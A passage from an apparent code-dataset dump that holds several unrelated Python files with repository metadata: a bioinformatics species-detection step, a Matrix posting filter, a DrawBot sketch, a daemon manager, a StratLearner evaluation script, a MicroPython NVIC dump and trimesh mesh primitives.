kraken_report_bracken_key = common.json_key_cleaner("kraken_report_bracken.txt")
bracken_key = common.json_key_cleaner("bracken.txt")
if ("status" not in results[kraken_report_bracken_key] and
"status" not in results[bracken_key] and
"species_1_count" in results[bracken_key] and
"species_2_count" in results[bracken_key]):
species_detection["summary"]["percent_unclassified"] = results[kraken_report_bracken_key]["unclassified_count"] / (results[kraken_report_bracken_key]["unclassified_count"] + results[kraken_report_bracken_key]["root"])
species_detection["summary"]["percent_classified_species_1"] = results[bracken_key]["species_1_count"] / (results[kraken_report_bracken_key]["unclassified_count"] + results[kraken_report_bracken_key]["root"])
species_detection["summary"]["name_classified_species_1"] = results[bracken_key]["species_1_name"]
species_detection["summary"]["percent_classified_species_2"] = results[bracken_key]["species_2_count"] / (results[kraken_report_bracken_key]["unclassified_count"] + results[kraken_report_bracken_key]["root"])
species_detection["summary"]["name_classified_species_2"] = results[bracken_key]["species_2_name"]
species_detection["summary"]["detected_species"] = species_detection["summary"]["name_classified_species_1"]
def set_sample_species(species_detection: Category, sample: Sample) -> None:
sample_info = sample.get_category("sample_info")
if sample_info is not None and sample_info.get("summary", {}).get("provided_species", None) is not None:
species_detection["summary"]["species"] = sample_info["summary"]["provided_species"]
else:
species_detection["summary"]["species"] = species_detection["summary"].get("detected_species", None)
def datadump(samplecomponent_ref_json: Dict):
samplecomponent_ref = SampleComponentReference(value=samplecomponent_ref_json)
samplecomponent = SampleComponent.load(samplecomponent_ref)
sample = Sample.load(samplecomponent.sample)
species_detection = samplecomponent.get_category("species_detection")
if species_detection is None:
species_detection = Category(value={
"name": "species_detection",
"component": {"id": samplecomponent["component"]["_id"], "name": samplecomponent["component"]["name"]},
"summary": {},
"report": {}
}
)
extract_bracken_txt(species_detection, samplecomponent["results"], samplecomponent["component"]["name"])
extract_kraken_report_bracken_txt(species_detection, samplecomponent["results"], samplecomponent["component"]["name"])
species_math(species_detection, samplecomponent["results"], samplecomponent["component"]["name"])
set_sample_species(species_detection, sample)
samplecomponent.set_category(species_detection)
sample.set_category(species_detection)
samplecomponent.save_files()
common.set_status_and_save(sample, samplecomponent, "Success")
with open(os.path.join(samplecomponent["component"]["name"], "datadump_complete"), "w+") as fh:
fh.write("done")
# `snakemake` is injected into the namespace when this file is run
# through a Snakemake `script:` directive.
datadump(
    snakemake.params.samplecomponent_ref_json,
)
| 57.840909 | 226 | 0.711591 | 610 | 5,090 | 5.622951 | 0.160656 | 0.116618 | 0.072012 | 0.057726 | 0.522157 | 0.472012 | 0.397668 | 0.340233 | 0.3 | 0.23965 | 0 | 0.005834 | 0.158153 | 5,090 | 87 | 227 | 58.505747 | 0.794632 | 0.011984 | 0 | 0.131579 | 0 | 0 | 0.179591 | 0.041101 | 0 | 0 | 0 | 0 | 0 | 1 | 0.065789 | false | 0 | 0.092105 | 0 | 0.157895 | 0 | 0 | 0 | 0 | null | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | null | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 1 | 0 |
e76785635d525e1ea987b9fb10498fdb21db674e | 627 | py | Python | ex6-8.py | yiyidhuang/PythonCrashCrouse2nd | 3512f9ab8fcf32c6145604a37e2a62feddf174d1 | [
"MIT"
] | null | null | null | ex6-8.py | yiyidhuang/PythonCrashCrouse2nd | 3512f9ab8fcf32c6145604a37e2a62feddf174d1 | [
"MIT"
] | null | null | null | ex6-8.py | yiyidhuang/PythonCrashCrouse2nd | 3512f9ab8fcf32c6145604a37e2a62feddf174d1 | [
"MIT"
] | null | null | null | cristiano = {
'type': 'dog',
'owner': 'wei',
}
rose = {
'type': 'cat',
'owner': 'yan',
}
cloud = {
'type': 'pig',
'owner': 'luo',
}
pets = [cristiano, rose, cloud]
for pet in pets:
if pet == cristiano:
print('\nCristiano: '
+ '\n\ttype: ' + pet['type']
+ '\n\towner: ' + pet['owner'])
elif pet == rose:
print('\nRose: '
+ '\n\ttype: ' + pet['type']
+ '\n\towner: ' + pet['owner'])
elif pet == cloud:
print('\nCould: '
+ '\n\ttype: ' + pet['type']
+ '\n\towner: ' + pet['owner'])
| 20.225806 | 45 | 0.405104 | 62 | 627 | 4.096774 | 0.387097 | 0.070866 | 0.106299 | 0.153543 | 0.385827 | 0.385827 | 0.385827 | 0.385827 | 0.275591 | 0.275591 | 0 | 0 | 0.365231 | 627 | 30 | 46 | 20.9 | 0.638191 | 0 | 0 | 0.230769 | 0 | 0 | 0.263158 | 0 | 0 | 0 | 0 | 0 | 0 | 1 | 0 | false | 0 | 0 | 0 | 0 | 0.115385 | 0 | 0 | 0 | null | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | null | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 1 | 0 |
e769251e473b5f4b32970f5dbac6d06da53753e2 | 4,766 | py | Python | dexy/filters/matrix.py | dexy/dexy | 323c1806e51f75435e11d2265703e68f46c8aef3 | [
"MIT"
] | 136 | 2015-01-06T15:04:47.000Z | 2021-12-21T22:52:41.000Z | dexy/filters/matrix.py | dexy/dexy | 323c1806e51f75435e11d2265703e68f46c8aef3 | [
"MIT"
] | 13 | 2015-01-26T14:06:58.000Z | 2020-03-27T21:16:10.000Z | dexy/filters/matrix.py | dexy/dexy | 323c1806e51f75435e11d2265703e68f46c8aef3 | [
"MIT"
] | 34 | 2015-01-02T16:24:53.000Z | 2021-11-27T05:38:30.000Z | from bs4 import BeautifulSoup
from dexy.filters.api import ApiFilter
import asyncio
import json
import mimetypes
import markdown
try:
from nio import AsyncClient
AVAILABLE = True
except ImportError:
AVAILABLE = False
async def main_nio(homeserver, user, password, room_id, ext, mimetype, data_provider, content, log_fn):
client = AsyncClient(homeserver, user)
await client.login(password)
upload_response, decrypt_info = None, None
if data_provider:
upload_response, decrypt_info = await client.upload(
data_provider,
mimetype
)
content['url'] = upload_response.content_uri
log_fn("uploading message to room %s: %s" % (room_id, str(content)))
response = await client.room_send(
room_id=room_id,
message_type="m.room.message",
content=content
)
await client.close()
return {
"event_id" : response.event_id,
"room_id" : response.room_id
}
class MatrixFilter(ApiFilter):
"""
Filter for posting text, files, or images to a matrix room. Uses matrix-nio
Create a .dexyapis JSON file in your HOME dir with format:
{
"matrix": {
"homeserver" : "https://example.org",
"username" : "@example:example.org",
"password" : "sekret1!"
}
}
"""
aliases = ['matrix']
_settings = {
'room-id' : ("The room id (NOT the room name!) to post to.", "!yMPKbtdRlqJWpwCcvg:matrix.org"),
'api-key-name' : 'matrix',
'input-extensions' : ['.*'],
'output-extensions' : ['.json']
}
def is_active(self):
return AVAILABLE
def data_provider(self, a, b):
# FIXME currently ignoring params a, b
return self.input_data.storage.data_file()
def process(self):
if self.input_data.ext in ('.html'):
text = str(self.input_data)
soup = BeautifulSoup(text, 'html.parser')
# https://matrix.org/docs/spec/client_server/r0.6.0#m-room-message-msgtypes
# "should" do this in bs4 but this works
# FIXME? bg-color is ignored in riot
modified_html = text.replace("style=\"color: ", "data-mx-color=\"").replace("style=\"background: ", "data-mx-bg-color=\"")
content = {
'msgtype' : 'm.text',
'format' : 'org.matrix.custom.html',
'body' : soup.get_text(),
'formatted_body' : modified_html
}
### "matrix-markdown"
elif self.input_data.ext in ('.md'):
text = str(self.input_data)
html = markdown.markdown(text, extensions=['fenced_code'])
soup = BeautifulSoup(html, 'html.parser')
for code_block in soup.find_all("code"):
code_block['class'] = "language-%s" % code_block['class'][0]
code_block.string = code_block.string.lstrip()
content = {
'msgtype' : 'm.text',
'format' : 'org.matrix.custom.html',
'body' : soup.get_text(),
'formatted_body' : str(soup)
}
### @end
elif self.input_data.ext in ('.txt'):
text = str(self.input_data)
content = {
'msgtype' : "m.text",
'body' : text
}
elif self.input_data.ext in ('.png', '.jpeg', '.jpg', '.bmp'):
if hasattr(self.doc, 'created_by_doc'):
description = "image %s generated by script %s" % (self.input_data.name, self.doc.created_by_doc.name)
else:
description = "automatically generated image %s" % self.input_data.name
content = {
'msgtype' : 'm.image',
'body' : description
}
else:
content = {
'msgtype' : 'm.file',
'filename' : self.input_data.name,
'body' : self.input_data.name
}
loop = asyncio.get_event_loop()
response = loop.run_until_complete(main_nio(
homeserver=self.read_param('homeserver'),
user=self.read_param('username'),
password=self.read_param('password'),
room_id=self.setting('room-id'),
ext=self.input_data.ext,
mimetype=mimetypes.guess_type(self.input_data.name)[0],
data_provider=self.data_provider,
content=content,
log_fn=self.log_debug
))
self.output_data.set_data(json.dumps(response))
| 32.868966 | 134 | 0.536299 | 511 | 4,766 | 4.857143 | 0.334638 | 0.050766 | 0.073328 | 0.032232 | 0.14585 | 0.084609 | 0.058018 | 0.058018 | 0.058018 | 0.058018 | 0 | 0.002553 | 0.342426 | 4,766 | 144 | 135 | 33.097222 | 0.789407 | 0.103651 | 0 | 0.156863 | 0 | 0 | 0.142891 | 0.017565 | 0 | 0 | 0 | 0.006944 | 0 | 1 | 0.029412 | false | 0.029412 | 0.078431 | 0.019608 | 0.166667 | 0 | 0 | 0 | 0 | null | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | null | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 1 | 0 |
e76a39929d3dba1cca55b2346b00be6b52fb4b66 | 880 | py | Python | vera molnar/random_grids.py | jkocontreras/drawbotscripts | 6688e65e057f25901ac1adb93c3108ab889de49f | [
"MIT"
] | null | null | null | vera molnar/random_grids.py | jkocontreras/drawbotscripts | 6688e65e057f25901ac1adb93c3108ab889de49f | [
"MIT"
] | null | null | null | vera molnar/random_grids.py | jkocontreras/drawbotscripts | 6688e65e057f25901ac1adb93c3108ab889de49f | [
"MIT"
] | null | null | null | import random
# ----------------------
# settings
pw = ph = 500
cell_a = 10 # amount of cells
sbdvs = 3 # subdivisions
gap = pw /(cell_a * sbdvs + cell_a + 1)
cell_s = sbdvs * gap
points = [(x * gap, y * gap) for x in range(sbdvs+1) for y in range(sbdvs+1) ]
# ----------------------
# function(s)
def a_grid_cell(pos, s, points, amount=None):
    # Draw one cell: an open polyline through `amount` randomly sampled
    # subdivision points, translated to the cell position `pos`.
    if amount is None:
        amount = len(points)
    points = random.sample(points, amount)
    with savedState():
        translate(*pos)
        polygon(*points, close=False)
# ----------------------
# drawing
newPage(pw, ph)
rect(0, 0, pw, ph)
translate(gap, gap)
fill(None)
strokeWidth(1)
stroke(1)
lineCap('round')
lineJoin('round')
for x in range(cell_a):
    for y in range(cell_a):
        # Pass the gap-aware cell origin so the function no longer
        # depends on the loop variables as globals.
        a_grid_cell((x * (cell_s + gap), y * (cell_s + gap)), cell_s, points, y + 3)
# saveImage('random_grids.jpg') | 19.555556 | 79 | 0.575 | 131 | 880 | 3.740458 | 0.389313 | 0.061224 | 0.02449 | 0.044898 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0.020202 | 0.2125 | 880 | 45 | 80 | 19.555556 | 0.686869 | 0.181818 | 0 | 0 | 0 | 0 | 0.014065 | 0 | 0 | 0 | 0 | 0 | 0 | 1 | 0.041667 | false | 0 | 0.041667 | 0 | 0.083333 | 0 | 0 | 0 | 0 | null | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | null | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 1 | 0 |
e76c666397b985650186328fae42e70cb9a10b72 | 1,835 | py | Python | distiller/core/Distiller.py | darkclouder/distiller | a8efbfd807d781b90daba6023e3f966a52836b42 | [
"BSD-2-Clause"
] | 3 | 2018-07-18T14:41:00.000Z | 2020-10-30T13:26:26.000Z | distiller/core/Distiller.py | darkclouder/distiller | a8efbfd807d781b90daba6023e3f966a52836b42 | [
"BSD-2-Clause"
] | 1 | 2018-07-19T08:23:09.000Z | 2018-07-19T08:23:09.000Z | distiller/core/Distiller.py | darkclouder/distiller | a8efbfd807d781b90daba6023e3f966a52836b42 | [
"BSD-2-Clause"
] | null | null | null | import os
from distiller.core.impl.HttpServer import HttpServer
from distiller.core.impl.CoreHandler import CoreHandler
class Distiller:
def __init__(self, env):
self.env = env
self.logger = self.env.logger.claim("Core")
self.shutdown = False
self.srv = HttpServer(CoreHandler(), self.env)
self.pidfile = self.env.config.get("distiller.pidfile", path=True)
def is_running(self):
# Check if pid file already exists
# and if the pid is still running
if os.path.isfile(self.pidfile):
with open(self.pidfile, "r") as f:
try:
pid = int(f.readline())
except ValueError:
self.logger.warning("Corrupt pid file")
os.remove(self.pidfile)
return False
# Check if process still running
try:
os.kill(pid, 0)
except OSError:
self.logger.notice("Daemon not running, but pid file exists")
os.remove(self.pidfile)
return False
else:
return True
return False
def run(self):
self.logger.notice("Daemon start-up")
# Write pid to pidfile
pid = str(os.getpid())
with open(self.pidfile, "w") as f:
f.write(pid)
# Start watchdog (non-blocking)
self.env.watchdog.run()
# Start web server (blocking)
self.srv.run()
def stop(self):
self.logger.notice("Daemon shutdown initiated")
# Stop web server
self.srv.stop()
# Stop watchdog (non-blocking)
self.env.watchdog.stop()
os.remove(self.pidfile)
self.logger.notice("Daemon shutdown done")
| 27.38806 | 81 | 0.541144 | 208 | 1,835 | 4.75 | 0.355769 | 0.049595 | 0.064777 | 0.089069 | 0.220648 | 0.129555 | 0 | 0 | 0 | 0 | 0 | 0.000856 | 0.363488 | 1,835 | 66 | 82 | 27.80303 | 0.845034 | 0.119346 | 0 | 0.195122 | 0 | 0 | 0.085874 | 0 | 0 | 0 | 0 | 0 | 0 | 1 | 0.097561 | false | 0 | 0.073171 | 0 | 0.292683 | 0 | 0 | 0 | 0 | null | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | null | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 1 | 0 |
e76ef4520136e84bfa60de421094e1c1499594a2 | 5,854 | py | Python | StratLearner/run_PreTrain.py | cdslabamotong/stratLearner | 58f278d438eed92683a7daac2605ec39abd18c94 | [
"MIT"
] | 7 | 2020-12-02T06:58:30.000Z | 2022-03-04T01:21:59.000Z | StratLearner/run_PreTrain.py | dm-ytlds/stratLearner | 3ad880a5ca0472a3a5823fa27db7dd2bc8ba0f33 | [
"MIT"
] | null | null | null | StratLearner/run_PreTrain.py | dm-ytlds/stratLearner | 3ad880a5ca0472a3a5823fa27db7dd2bc8ba0f33 | [
"MIT"
] | 1 | 2020-12-02T06:58:32.000Z | 2020-12-02T06:58:32.000Z | """
==============================
StratLearner Training
==============================
"""
import numpy as np
from one_slack_ssvm import OneSlackSSVM
from stratLearner import (StratLearn, Utils, InputInstance)
import multiprocessing
import argparse
import os
import sys
from datetime import datetime
class Object(object):
pass
parser = argparse.ArgumentParser()
parser.add_argument(
'--path', default="pre_train/preTrain_power768_uniform_structure0-01_100", help='the file of a pre_train model')
parser.add_argument(
'--testNum', type=int, default=270, help='number of testing data')
parser.add_argument(
'--thread', type=int, default=3, help='number of threads')
parser.add_argument(
'--output', action="store_true", help='if output prediction')
args = parser.parse_args()
utils = Utils()
file = open(args.path, 'r')
dataname = file.readline().split()[0]
vNum = int(file.readline().split()[0])
featureGenMethod = file.readline().split()[0]
featureNum = int(file.readline().split()[0])
indexes = []
w = []
line = file.readline()
while line:
    indexes.append(int(line.split()[0]))
    w.append(float(line.split()[1]))
    line = file.readline()
file.close()  # release the pre-trained model file
trainNum =0
testNum =args.testNum
pairMax=2500
thread = args.thread
verbose=3
#parameter used in SVM
C = 0.01
tol=0.001
if featureGenMethod == "uniform_structure1-0":
maxFeatureNum=1
max_iter=0
else:
if featureGenMethod == "WC_Weibull_structure":
maxFeatureNum=800
max_iter = 0
else:
maxFeatureNum=2000
max_iter = 0
#define the one-hop loss
balance_para = 1000
loss_type = Object()
loss_type.name="area"
loss_type.weight=1
LAI_method = "fastLazy"
effectAreaNum = 1
# number of Monte Carlo diffusion simulations used for evaluation
infTimes = 1080
#get data
path = os.getcwd()
data_path=os.path.abspath(os.path.join(path, os.pardir))+"/data"
pair_path = "{}/{}/{}_pair_{}".format(data_path,dataname,dataname,pairMax)
graphPath = "{}/{}/{}_diffusionModel".format(data_path,dataname,dataname)
featurePath = "{}/{}/feature/{}_{}/".format(data_path,dataname,featureGenMethod,maxFeatureNum)
X_train, Y_train, _, _, X_test, Y_test, _, _ = utils.getDataTrainTestRandom(pair_path ,trainNum,testNum, pairMax)
print("data fetched")
instance = InputInstance(graphPath, featurePath, featureNum, vNum, effectAreaNum,
balance_para, loss_type, featureRandom = True, maxFeatureNum = maxFeatureNum,
thread = thread, LAI_method=LAI_method, indexes=indexes)
#**************************OneSlackSSVM
model = StratLearn()
model.initialize(X_train, Y_train, instance)
one_slack_svm = OneSlackSSVM(model, verbose=verbose, C=C, tol=tol, n_jobs=thread,
max_iter = max_iter)
#one_slack_svm.fit(X_train, Y_train, initialize = False)
one_slack_svm.w=w
print("Prediction Started")
Y_pred = one_slack_svm.predict(X_test, featureNum)
print("Testing Started")
block_size = int(testNum / thread)
p = multiprocessing.Pool(thread)
influence_Xs = p.starmap(instance.testInfluence_0_block, ((X_test[i*block_size:(i+1)*block_size], infTimes) for i in range(thread)),1)
p.close()
p.join()
p = multiprocessing.Pool(thread)
influence_Ys = p.starmap(instance.testInfluence_0_block, ((X_test[i*block_size:(i+1)*block_size], infTimes, Y_test[i*block_size:(i+1)*block_size]) for i in range(thread)),1)
p.close()
p.join()
p = multiprocessing.Pool(thread)
influence_Y_preds = p.starmap(instance.testInfluence_0_block, ((X_test[i*block_size:(i+1)*block_size], infTimes, Y_pred[i*block_size:(i+1)*block_size]) for i in range(thread)),1)
p.close()
p.join()
influence_X=[]
influence_Y=[]
influence_Y_pred=[]
for i in range(thread):
influence_X.extend(influence_Xs[i])
influence_Y.extend(influence_Ys[i])
influence_Y_pred.extend(influence_Y_preds[i])
reduce_percent_opt=[]
reduce_percent_pre = []
com_to_opt = []
error_abs = []
error_ratio = []
for influence_x, influence_y, influence_y_pred in zip(influence_X, influence_Y, influence_Y_pred):
#print("{} {} {} {} {}".format(influence_x,influence_y,influence_y_pred, influence_x_read, influence_y_read))
reduce_percent_opt.append((influence_x-influence_y)/influence_x)
reduce_percent_pre.append( (influence_x-influence_y_pred)/influence_x)
com_to_opt.append((influence_x-influence_y_pred)/(influence_x-influence_y+0.01))
error_abs.append((influence_y_pred-influence_y))
error_ratio.append((influence_y_pred-influence_y)/influence_y)
if args.output:
now = datetime.now()
with open(now.strftime("%d-%m-%Y %H:%M:%S"), 'a') as the_file:
for x_test, y_test, y_pred in zip(X_test,Y_test,Y_pred):
for target in [x_test, y_test, y_pred]:
line='';
for a in target:
line += a
line += ' '
line += '\n'
the_file.write(line)
the_file.write('\n')
print(dataname)
print('StratLearner')
print("error_abs: {} +- {}".format(np.mean(np.array(error_abs)), np.std(np.array(error_abs))))
print("error_ratio: {} +- {}".format(np.mean(np.array(error_ratio)), np.std(np.array(error_ratio))))
print("reduce_percent_opt: {} +- {}".format(np.mean(np.array(reduce_percent_opt)), np.std(np.array(reduce_percent_opt))))
print("reduce_percent_pre: {} +- {}".format(np.mean(np.array(reduce_percent_pre)), np.std(np.array(reduce_percent_pre))))
print("com_to_opt: {} +- {}".format(np.mean(np.array(com_to_opt)), np.std(np.array(com_to_opt))))
#
print("featureNum:{}, featureGenMethod: {}, c:{} balance_para: {}".format(featureNum, featureGenMethod, C,balance_para))
print("trainNum:{}, testNum:{}, infTimes:{} ".format(trainNum, testNum, infTimes))
print("loss_type:{}, LAI_method:{}, ".format(loss_type.name, LAI_method))
print("===============================================================")
| 29.27 | 178 | 0.686197 | 808 | 5,854 | 4.730198 | 0.221535 | 0.057561 | 0.032967 | 0.041863 | 0.333595 | 0.249084 | 0.181057 | 0.128728 | 0.10675 | 0.10675 | 0 | 0.013685 | 0.138709 | 5,854 | 199 | 179 | 29.417085 | 0.744347 | 0.064742 | 0 | 0.155039 | 0 | 0 | 0.124931 | 0.025463 | 0 | 0 | 0 | 0 | 0 | 1 | 0 | false | 0.007752 | 0.062016 | 0 | 0.069767 | 0.108527 | 0 | 0 | 0 | null | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | null | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 1 | 0 |
e771901cac33122ea8a46bf698c48b3de96e015e | 886 | py | Python | nvic.py | dhylands/upy-examples | 90cca32f0c6c65c33967da9ac1a998e731c60d91 | [
"MIT"
] | 78 | 2015-01-15T23:24:21.000Z | 2022-02-25T09:24:58.000Z | nvic.py | dhylands/upy-examples | 90cca32f0c6c65c33967da9ac1a998e731c60d91 | [
"MIT"
] | 1 | 2015-02-04T00:51:52.000Z | 2015-02-04T00:51:52.000Z | nvic.py | dhylands/upy-examples | 90cca32f0c6c65c33967da9ac1a998e731c60d91 | [
"MIT"
] | 26 | 2015-02-03T21:26:33.000Z | 2022-02-21T02:57:46.000Z | import machine
SCS = 0xE000E000          # Cortex-M System Control Space
SCB = SCS + 0x0D00        # System Control Block
NVIC = SCS + 0x0100       # Nested Vectored Interrupt Controller
VTOR = SCB + 0x08         # Vector Table Offset Register
SCB_SHP = SCB + 0x18      # System Handler Priority registers (SHPR1-3)
NVIC_PRIO = NVIC + 0x300  # NVIC interrupt priority registers (IPR)
def dump_nvic():
print('NVIC_PRIO = {:08x} @ {:08x}'.format(machine.mem32[NVIC_PRIO], NVIC_PRIO))
print('VTOR = {:08x} @ {:08x}'.format(machine.mem32[VTOR], VTOR))
print('System IRQs')
for i in range(12):
irq = -(16 - (i + 4))
prio = machine.mem8[SCB_SHP + i] >> 4
if prio > 0:
print('{:3d}:{:d}'.format(irq, prio))
print('Regular IRQs')
for irq in range(80):
prio = machine.mem8[NVIC_PRIO + irq] >> 4
if prio > 0:
print('{:3d}:{:d}'.format(irq, prio))
def nvic_set_prio(irq, prio):
if irq < 0:
idx = (irq & 0x0f) - 4
machine.mem8[SCB_SHP + idx] = prio << 4
else:
machine.mem8[NVIC_PRIO + irq] = prio << 4
dump_nvic()
| 23.945946 | 84 | 0.546275 | 127 | 886 | 3.708661 | 0.322835 | 0.101911 | 0.050955 | 0.080679 | 0.318471 | 0.123142 | 0.123142 | 0.123142 | 0.123142 | 0.123142 | 0 | 0.096215 | 0.284424 | 886 | 36 | 85 | 24.611111 | 0.646688 | 0 | 0 | 0.142857 | 0 | 0 | 0.109481 | 0 | 0 | 0 | 0.044018 | 0 | 0 | 1 | 0.071429 | false | 0 | 0.035714 | 0 | 0.107143 | 0.214286 | 0 | 0 | 0 | null | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | null | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 1 | 0 |
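A small usage sketch for `nvic_set_prio`; the IRQ numbers are hypothetical, and the 4-bit priority width is an assumption matching the shifts used above:

nvic_set_prio(37, 6)   # regular IRQ 37 -> priority 6
nvic_set_prio(-1, 2)   # SysTick (system IRQ -1) -> priority 2
dump_nvic()            # verify the new values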
e772c6aaf22ad97381e12d6d2154f737e40ff951 | 9,152 | py | Python | trimesh/primitives.py | maganrobotics/UR3e-manipulation | ceaf650b1a811d0bfc3baf175d353fc7f4a33522 | [
"MIT"
] | null | null | null | trimesh/primitives.py | maganrobotics/UR3e-manipulation | ceaf650b1a811d0bfc3baf175d353fc7f4a33522 | [
"MIT"
] | null | null | null | trimesh/primitives.py | maganrobotics/UR3e-manipulation | ceaf650b1a811d0bfc3baf175d353fc7f4a33522 | [
"MIT"
] | null | null | null | import numpy as np
from . import util
from . import points
from . import creation
from .base import Trimesh
from .constants import log
from .triangles import windings_aligned
class Primitive(Trimesh):
'''
Geometric primitives which are a subclass of Trimesh.
Mesh is generated lazily when vertices or faces are requested.
'''
def __init__(self, *args, **kwargs):
super(Primitive, self).__init__(*args, **kwargs)
self._data.clear()
self._validate = False
@property
def faces(self):
stored = self._cache['faces']
if util.is_shape(stored, (-1,3)):
return stored
self._create_mesh()
#self._validate_face_normals()
return self._cache['faces']
@faces.setter
def faces(self, values):
log.warning('Primitive faces are immutable! Not setting!')
@property
def vertices(self):
stored = self._cache['vertices']
if util.is_shape(stored, (-1,3)):
return stored
self._create_mesh()
return self._cache['vertices']
@vertices.setter
def vertices(self, values):
if values is not None:
log.warning('Primitive vertices are immutable! Not setting!')
@property
def face_normals(self):
stored = self._cache['face_normals']
if util.is_shape(stored, (-1,3)):
return stored
self._create_mesh()
return self._cache['face_normals']
@face_normals.setter
def face_normals(self, values):
if values is not None:
log.warning('Primitive face normals are immutable! Not setting!')
def _create_mesh(self):
raise ValueError('Primitive doesn\'t define mesh creation!')
class Sphere(Primitive):
def __init__(self, *args, **kwargs):
'''
Create a Sphere primitive, which is a subclass of Trimesh.
Arguments
----------
sphere_radius: float, radius of sphere
sphere_center: (3,) float, center of sphere
subdivisions: int, number of subdivisions for icosphere. Default is 3
'''
super(Sphere, self).__init__(*args, **kwargs)
if 'sphere_radius' in kwargs:
self.sphere_radius = kwargs['sphere_radius']
if 'sphere_center' in kwargs:
self.sphere_center = kwargs['sphere_center']
if 'subdivisions' in kwargs:
self._data['subdivisions'] = int(kwargs['subdivisions'])
else:
self._data['subdivisions'] = 3
self._unit_sphere = creation.icosphere(subdivisions=self._data['subdivisions'])
@property
def sphere_center(self):
stored = self._data['center']
if stored is None:
return np.zeros(3)
return stored
@sphere_center.setter
def sphere_center(self, values):
self._data['center'] = np.asanyarray(values, dtype=np.float64)
@property
def sphere_radius(self):
stored = self._data['radius']
if stored is None:
return 1.0
return stored
@sphere_radius.setter
def sphere_radius(self, value):
self._data['radius'] = float(value)
def _create_mesh(self):
ico = self._unit_sphere
self._cache['vertices'] = ((ico.vertices * self.sphere_radius) +
self.sphere_center)
self._cache['faces'] = ico.faces
self._cache['face_normals'] = ico.face_normals
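    # A minimal usage sketch (assumed API, mirroring the constructor kwargs above):
    #   s = Sphere(sphere_radius=2.0, sphere_center=[0.0, 0.0, 1.0], subdivisions=4)
    #   s.vertices  # the icosphere mesh is generated lazily on first access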
class Box(Primitive):
def __init__(self, *args, **kwargs):
'''
Create a Box primitive, which is a subclass of Trimesh
Arguments
----------
box_extents: (3,) float, size of box
box_transform: (4,4) float, transformation matrix for box
        box_center: (3,) float, convenience argument which updates box_transform
                    with a translation-only matrix
'''
super(Box, self).__init__(*args, **kwargs)
if 'box_extents' in kwargs:
self.box_extents = kwargs['box_extents']
if 'box_transform' in kwargs:
self.box_transform = kwargs['box_transform']
if 'box_center' in kwargs:
self.box_center = kwargs['box_center']
self._unit_box = creation.box()
@property
def box_center(self):
return self.box_transform[0:3,3]
@box_center.setter
def box_center(self, values):
transform = self.box_transform
transform[0:3,3] = values
self._data['box_transform'] = transform
@property
def box_extents(self):
stored = self._data['box_extents']
if util.is_shape(stored, (3,)):
return stored
return np.ones(3)
@box_extents.setter
def box_extents(self, values):
self._data['box_extents'] = np.asanyarray(values, dtype=np.float64)
@property
def box_transform(self):
stored = self._data['box_transform']
if util.is_shape(stored, (4,4)):
return stored
return np.eye(4)
@box_transform.setter
def box_transform(self, matrix):
matrix = np.asanyarray(matrix, dtype=np.float64)
if matrix.shape != (4,4):
raise ValueError('Matrix must be (4,4)!')
self._data['box_transform'] = matrix
@property
def is_oriented(self):
if util.is_shape(self.box_transform, (4,4)):
return not np.allclose(self.box_transform[0:3,0:3], np.eye(3))
else:
return False
def _create_mesh(self):
log.debug('Creating mesh for box primitive')
box = self._unit_box
vertices, faces, normals = box.vertices, box.faces, box.face_normals
vertices = points.transform_points(vertices * self.box_extents,
self.box_transform)
normals = np.dot(self.box_transform[0:3,0:3],
normals.T).T
aligned = windings_aligned(vertices[faces[:1]], normals[:1])[0]
if not aligned:
faces = np.fliplr(faces)
# for a primitive the vertices and faces are derived from other information
# so it goes in the cache, instead of the datastore
self._cache['vertices'] = vertices
self._cache['faces'] = faces
self._cache['face_normals'] = normals
class Extrusion(Primitive):
def __init__(self, *args, **kwargs):
'''
Create an Extrusion primitive, which subclasses Trimesh
Arguments
----------
extrude_polygon: shapely.geometry.Polygon, polygon to extrude
extrude_transform: (4,4) float, transform to apply after extrusion
extrude_height: float, height to extrude polygon by
'''
super(Extrusion, self).__init__(*args, **kwargs)
if 'extrude_polygon' in kwargs:
self.extrude_polygon = kwargs['extrude_polygon']
if 'extrude_transform' in kwargs:
self.extrude_transform = kwargs['extrude_transform']
if 'extrude_height' in kwargs:
self.extrude_height = kwargs['extrude_height']
@property
def extrude_transform(self):
stored = self._data['extrude_transform']
if np.shape(stored) == (4,4):
return stored
return np.eye(4)
@extrude_transform.setter
def extrude_transform(self, matrix):
matrix = np.asanyarray(matrix, dtype=np.float64)
if matrix.shape != (4,4):
raise ValueError('Matrix must be (4,4)!')
self._data['extrude_transform'] = matrix
@property
def extrude_height(self):
stored = self._data['extrude_height']
if stored is None:
raise ValueError('extrude height not specified!')
